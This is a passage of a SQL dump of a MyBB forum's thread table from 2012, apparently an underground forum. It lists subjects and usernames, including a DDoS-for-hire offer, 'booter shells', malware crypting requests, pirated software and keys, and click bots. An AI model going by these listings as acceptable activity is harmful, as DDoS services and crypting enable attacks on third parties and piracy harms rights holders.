`sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('381', '3', 'Server Error', '0', '0', '0', '82', 'iTzIpod', '1347233155', '1747', '1347234400', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('393', '55', 'someone can crypt my server?', '0', '0', '0', '62', 'R?????zo?', '1347453303', '1834', '1347453303', 'R?????zo?', '62', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('390', '35', 'Which Photoshop version do you use?', '0', '0', '0', '82', 'iTzIpod', '1347365768', '1796', '1348831964', 'iTzIpod', '82', '21', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('382', '43', '[file ice]4 windows 8 keys', '0', '0', '0', '1', 't3h jok3r', '1347247699', '1760', '1347247699', 't3h jok3r', '1', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('384', '55', 'Booter Shells', '0', '0', '0', '67', 'HoverCatz', '1347299119', '1767', '1347327508', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('385', '19', '[Junk][Important] Discussion', '0', '0', '0', '82', 'iTzIpod', '1347305265', '1768', '1349127861', 'iTzIpod', '82', '49', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('387', '24', 'Good add ons on your computer.. Best upgrades on old computers', '0', '0', '0', '5', 'Timmy', '1347328926', '1775', '1347328926', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('388', '52', 'Request for the coders group', '0', '0', '0', '7', 'Romdu62', '1347329794', '1781', '1347936396', 'Romdu62', '7', '62', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('389', '49', '[Suggestion] GFX Request Section', '0', '0', '0', '82', 'iTzIpod', '1347362908', '1794', '1347465866', 't3h jok3r', '1', '14', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('391', '3', 'Demoted', '0', '0', '0', '20', 'JakeUS', '1347411541', '1815', '1347493854', 'JakeUS', '20', '29', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('392', '9', 'PPD Niches', '0', '0', '0', '61', 'NXK', '1347411949', '1816', '1349874577', 'VirtualLegend', '228', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('394', '3', '[Bug] Username linking to profile', '0', '0', '0', '82', 'iTzIpod', '1347478573', '1844', '1347491015', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('395', '9', 'Make 150+ a Day - Easy Blackhat Method!', '0', '0', '0', '1', 't3h jok3r', '1347484179', '1850', '1347484179', 't3h jok3r', '1', '11', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('399', '3', '[Bug] Error', '0', '0', '0', '82', 'iTzIpod', '1347537342', '1869', '1347593566', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('397', '42', '11th Anniversary of 9/11', '0', '0', '0', '82', 'iTzIpod', '1347494305', '1859', '1347711217', 'iTzIpod', '82', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('398', '21', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '0', '0', '100', '??zg???g????61', '1347497923', '1860', '1352518368', 'Triple H', '4', '172', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('400', '59', 'Free Pizza method', '0', '0', '0', '61', 'NXK', '1347568353', '1880', '1347590168', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('401', '12', 'How to get a free skype resolver with working numbers !', '0', '0', '0', '82', 'iTzIpod', '1347570604', '1881', '1347632962', 'iTzIpod', '82', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('422', '19', '[Junk][Read] Announcement', '0', '0', '0', '82', 'iTzIpod', '1347634256', '1936', '1349127796', 'iTzIpod', '82', '17', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('403', '18', 'Youtube Bot', '0', '0', '0', '82', 'iTzIpod', '1347571098', '1883', '1347910368', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('404', '30', 'Sony Vegas Pro 11.0 & After Effects', '0', '0', '0', '82', 'iTzIpod', '1347571259', '1884', '1347628346', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('405', '29', 'Adf.ly Mass Clicking Bot', '0', '0', '0', '82', 'iTzIpod', '1347571418', '1885', '1348274999', 'Timmy', '5', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('406', '30', 'Skype Fake Quote Generator', '0', '0', '0', '82', 'iTzIpod', '1347571538', '1886', '1347681912', 'iTzIpod', '82', '12', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('407', '29', 'Instagram Bot [Mass Like]', '0', '0', '0', '82', 'iTzIpod', '1347571650', '1887', '1347586424', 'iTzIpod', '82', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('408', '30', 'Hotmail Account Creator', '0', '0', '0', '82', 'iTzIpod', '1347571776', '1888', '1347571776', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('409', '30', '[Full] Forum Poster 3.30', '0', '0', '0', '82', 'iTzIpod', '1347571952', '1889', '1348011785', 'iTzIpod', '82', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('410', '30', 'Enhance Views Credits Booster', '0', '0', '0', '82', 'iTzIpod', '1347572179', '1890', '1349875002', 'sirchamp', '53', '19', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('411', '30', 'Enhance Views Booster', '0', '0', '0', '82', 'iTzIpod', '1347572348', '1891', '1347572348', 'iTzIpod', '82', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('412', '7', '400th Thread', '0', '0', '0', '82', 'iTzIpod', '1347572744', '1892', '1347711707', 'iTzIpod', '82', '18', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('413', '29', 'EARN $50/HOUR EASILY', '0', '0', '0', '82', 'iTzIpod', '1347586825', '1899', '1350854570', 'VirtualLegend', '228', '30', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('414', '29', 'Maximize Profits Using Google Adsense', '0', '0', '0', '82', 'iTzIpod', '1347587006', '1900', '1348278205', 'iTzIpod', '82', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('415', '59', '2000+ eBooks', '0', '0', '0', '82', 'iTzIpod', '1347587134', '1901', '1347587134', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('416', '29', 'Earn Money from Captcha', '0', '0', '0', '82', 'iTzIpod', '1347587730', '1902', '1347628295', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('417', '4', 'HI!', '0', '6', '0', '184', 'Homeless', '1347595892', '1911', '1347676924', 'p420', '9', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('418', '16', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347630216', '1925', '1352597515', 'iTzIpod', '82', '67', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('419', '49', '[Suggestion] Signature Characters + for + Members', '0', '0', '0', '82', 'iTzIpod', '1347630708', '1926', '1347663878', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('420', '49', '[Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '0', '0', '82', 'iTzIpod', '1347631082', '1927', '1347683927', 't3h jok3r', '1', '15', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('421', '49', '[Suggestion] Upgraded Members get no waiting time', '0', '0', '0', '82', 'iTzIpod', '1347631417', '1929', '1347664130', 't3h jok3r', '1', '13', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('423', '9', 'Earn money by Copy & Pasting', '0', '0', '0', '82', 'iTzIpod', '1347636154', '1937', '1347912711', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('424', '61', 'Money Making eBooks', '0', '0', '0', '82', 'iTzIpod', '1347636203', '1938', '1347678166', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('425', '61', 'Huge SEing Giveaway [50+]', '0', '0', '0', '82', 'iTzIpod', '1347636332', '1939', '1347717416', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('426', '30', '[100% Virus Free] Photoshop CS5', '0', '0', '0', '82', 'iTzIpod', '1347636446', '1940', '1352551193', 'iTzIpod', '82', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('427', '61', 'Photoshop CS6 Extended 64 Bit', '0', '0', '0', '82', 'iTzIpod', '1347636588', '1941', '1347717463', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('428', '74', 'Dark Steam | Free Steam Games', '0', '0', '0', '82', 'iTzIpod', '1347636703', '1942', '1350157556', 'iTzIpod', '82', '34', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('435', '4', 'Newbie Here', '0', '0', '0', '188', 'Lonnie', '1347666181', '1984', '1347927900', 'JakeUS', '20', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('429', '2', 'testing similes', '0', '0', '0', '1', 't3h jok3r', '1347647241', '1949', '1347647280', 't3h jok3r', '1', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('430', '9', '? ?[3$]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '0', '0', '53', 'sirchamp', '1347647305', '1951', '1347890940', 'NXK', '61', '30', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('432', '61', '145+ eBooks Giveaway', '0', '0', '0', '82', 'iTzIpod', '1347654427', '1968', '1347678235', 'iTzIpod', '82', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('431', '61', '[Free] R?????zo?\'s GFX Service', '0', '0', '0', '62', 'R?????zo?', '1347649952', '1957', '1350905653', 'R?????zo?', '62', '357', '69', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('433', '61', '2000+ eBooks Giveaway', '0', '0', '0', '82', 'iTzIpod', '1347654511', '1969', '1347717539', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('438', '13', 'Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '0', '0', '9', 'p420', '1347677781', '2012', '1347852970', 'Timmy', '5', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('434', '61', 'Money Making eBook', '0', '0', '0', '82', 'iTzIpod', '1347664759', '1981', '1347711613', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('436', '7', 'Motivation', '0', '0', '0', '82', 'iTzIpod', '1347671765', '1988', '1347936130', 'Timmy', '5', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('437', '3', 'Help keep LH up', '0', '0', '0', '1', 't3h jok3r', '1347676177', '1995', '1347935598', 't3h jok3r', '1', '60', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('447', '7', '2000 Posts', '0', '0', '0', '82', 'iTzIpod', '1347718314', '2070', '1347743409', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('439', '58', 'Unique - Recruitment', '0', '0', '0', '82', 'iTzIpod', '1347712290', '2051', '1349834528', 't3h jok3r', '1', '145', '28', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, 